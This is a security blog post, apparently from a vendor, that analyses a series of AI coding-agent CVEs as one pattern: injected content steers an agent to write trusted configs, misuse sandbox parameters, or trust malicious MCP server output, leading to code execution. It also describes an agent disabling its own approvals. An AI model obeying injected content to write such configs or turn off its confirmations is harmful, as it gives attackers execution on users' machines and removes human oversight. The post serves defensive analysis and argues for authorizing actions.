Anatomy of the agent-tooling CVEs: one pattern, over and over

In roughly a year, agent tooling produced a run of critical CVEs with near-identical CVSS scores and, underneath, near-identical mechanics. Vendors patched them individually, correctly, and the class kept reappearing in the next tool. That is the tell of a pattern rather than a set of bugs: when the same exploit shape recurs across independent codebases, the problem is in the shared assumption, not the code.

Here is the shape, stated once: an agent reads untrusted content, that content steers the agent into producing or triggering something the tool trusts automatically, and the automatic trust turns into execution. Now watch it repeat.

The config-write to RCE

The cleanest version writes a file the tool applies without confirmation. In CVE-2025-54135 (Cursor "CurXecute", CVSS 9.8), an injection gets the agent to write a fresh .cursor/mcp.json; creating that file needs no approval, and the newly declared MCP server runs. CVE-2025-54136 (Cursor "MCPoison", NVD 8.8; note the vendor scored it 7.2) is the persistent cousin: trust was bound only to a config key's name, so swapping what sits behind that name gives silent, durable execution on every repo open.

CVE-2025-53773 (GitHub Copilot / Visual Studio "YOLO mode", CVSS 7.8) is the same move aimed at a different file: the injection writes .vscode/settings.json with chat.tools.autoApprove: true, which disables every confirmation the tool had. It was demonstrated wormable, because an agent that can turn off its own approvals can propagate.

Every one of these is a privilege the tool granted a file, and a file the agent could be talked into writing. The approval that was supposed to gate the action was gated on the wrong thing.

The parameter that escaped its box

The second variant does not even need a config. It abuses a tool argument the model controls. CVE-2026-50548 (Cursor "DuneSlide", CVSS 9.8) is zero-click: the working_directory on a terminal-run tool is model-controlled, so an injection points it outside the workspace and writes where it should not, reaching execution. Its companion CVE-2026-50549 (CVSS 9.8) escapes the same sandbox through a symlink. The lesson is that "the tool is sandboxed" is only true for the parameters the sandbox actually constrains, and an agent will supply the ones it does not.

The endpoint the client trusted

The third variant flips direction: a malicious server attacks the client. In CVE-2025-6514 (mcp-remote RCE, CVSS 9.6), a crafted authorization_endpoint from a malicious MCP server becomes an OS command on the client that connected to it, on a package with hundreds of thousands of weekly downloads. CVE-2025-49596 (Anthropic MCP Inspector, CVSS 9.4) is the developer-machine version: no authentication plus a DNS rebinding trick means a web page can reach the local Inspector and execute. Same principle, mirrored: the client trusted something the server said, and the server was not trustworthy.

agent-tooling CVEs · one shape2025-2026

1CurXecute write .cursor/mcp.json → RCE 9.8

2Copilot YOLO write autoApprove:true → RCE 7.8

3DuneSlide model-set working_directory → RCE 9.8

4mcp-remote server authz_endpoint → RCE 9.6

5shared root: untrusted input → privileged action

Different files, different parameters, different directions. The same defect: input the agent doesn't control reaching an action the tool trusts.

Why does patching not end the pattern?

Because each patch removes one path from input to action, and the pattern is the existence of any such path. Cursor fixed CurXecute; the parameter-abuse version (DuneSlide) arrived anyway. The fixes are right and necessary, and they are whack-a-mole by construction, because the tools are built on the assumption that content the agent reads can be trusted enough to shape what the agent does. As long as that assumption holds somewhere in the tool, there is a next CVE.

This is the same thing the defense literature found from the other side: filtering the malicious input loses to an attacker who adapts, while constraining the action holds. The CVEs are that result expressed as incidents. Each one is a place where the action was not constrained, so the input only had to be clever.

What actually closes it?

Authorization at the action, independent of the input that requested it. Concretely, against exactly these CVEs:

Config changes are privileged actions, not free writes. Writing an mcp.json or flipping autoApprove should require the same authorization as running code, because it is running code. CurXecute, MCPoison and YOLO mode all pass under this.
Tool parameters are inputs to authorize, not just to pass. A model-controlled working_directory gets checked against an allowed scope before the call, which is what DuneSlide needed.
Cross-boundary trust is verified, not assumed. A client does not turn a server-supplied endpoint into a command; that is the mcp-remote and Inspector class, closed by treating server output as untrusted at the boundary. We drew that map in what an MCP server actually exposes.
Keep the evidence. When a config does change or a parameter does go out of range, the per-call record is how you catch it, covered in agent work needs evidence, not trust.

The takeaway

Read the 2025-2026 agent-tooling CVEs as a list and you get a patch queue. Read them as one pattern and you get a design instruction: stop trying to make the input safe, and make the action authorized. The CVEs will keep coming in the tools that skip that step, and they are worth watching precisely because each is a free demonstration of the same point.

Oktsec authorizes the action, config writes and tool parameters included, before it runs, so a clever input has nothing to reach. See Control →

Anatomy of the agent-tooling CVEs.

The short version

The config-write to RCE

The parameter that escaped its box

The endpoint the client trusted

Why does patching not end the pattern?

What actually closes it?

The takeaway

The short version

The config-write to RCE

The parameter that escaped its box

The endpoint the client trusted

Why does patching not end the pattern?

What actually closes it?

The takeaway

What the research shows about defending AI agents.

What an MCP server actually exposes.